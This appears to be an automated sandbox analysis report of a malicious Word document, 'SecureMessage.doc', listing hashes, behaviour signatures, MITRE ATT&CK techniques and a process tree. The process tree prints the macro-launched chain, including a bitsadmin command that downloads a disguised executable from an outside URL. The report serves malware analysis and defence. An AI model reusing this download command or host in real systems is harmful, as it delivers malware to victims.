Analysis

  • max time kernel
    118s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    13-10-2021 15:11

General

  • Target

    SecureMessage.doc

  • Size

    82KB

  • MD5

    b6bf42a76eb8cea70cb0a9ba2b8f31d5

  • SHA1

    fc27036fefb683e218140e1f0af78f23d711a866

  • SHA256

    3d808601a47c9ae6c1c121a5eb3297ebb8a75f3663cc425f92fc541b90c8200e

  • SHA512

    8c0d9633420537bc3c8c16114959fd9648a31f7ca1fab536a67cd0ca6acb039769f9b0a4845679f32616dcbf16e1efbe6bbed9a53be43dc35cf5a06017e847e0

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecureMessage.doc"
    1⤵
    • Deletes itself
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:596
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 30 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:656
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /transfer backup /download /priority high https://usdata.estoreseller.com/images/logoimage.png "C:\Users\Admin\AppData\Roaming\zspriteimperturbably.exe"
        3⤵
        • Download via BitsAdmin
        PID:868
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2020

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    BITS Jobs

    1
    T1197

    Defense Evasion

    BITS Jobs

    1
    T1197

    Modify Registry

    1
    T1112

    Discovery

    Remote System Discovery

    1
    T1018

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.bat
      MD5

      3c5d37bcc0200c0c5358e989fee78aa6

      SHA1

      2460dcf0890ddca0aac438bcbec80aea4ba1c633

      SHA256

      4dc218c92aa2b223437b34295ceb788ab098a6331d574408b024e8503f26d93c

      SHA512

      c4d890c110140aa980756a3fdfc490805079132d0e17b35cbb6bdfda6682c8bd166de3d4c4246230ef4dc9453d616d8cff38c5b09f47f84ed44ef1a6b4eb5d30

    • memory/596-58-0x0000000000000000-mapping.dmp
    • memory/596-66-0x0000000000480000-0x0000000000481000-memory.dmp
      Filesize

      4KB

    • memory/656-60-0x0000000000000000-mapping.dmp
    • memory/868-63-0x0000000000000000-mapping.dmp
    • memory/1144-54-0x0000000072961000-0x0000000072964000-memory.dmp
      Filesize

      12KB

    • memory/1144-55-0x00000000703E1000-0x00000000703E3000-memory.dmp
      Filesize

      8KB

    • memory/1144-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1144-57-0x0000000075B11000-0x0000000075B13000-memory.dmp
      Filesize

      8KB

    • memory/1144-67-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2020-61-0x0000000000000000-mapping.dmp
    • memory/2020-62-0x000007FEFC011000-0x000007FEFC013000-memory.dmp
      Filesize

      8KB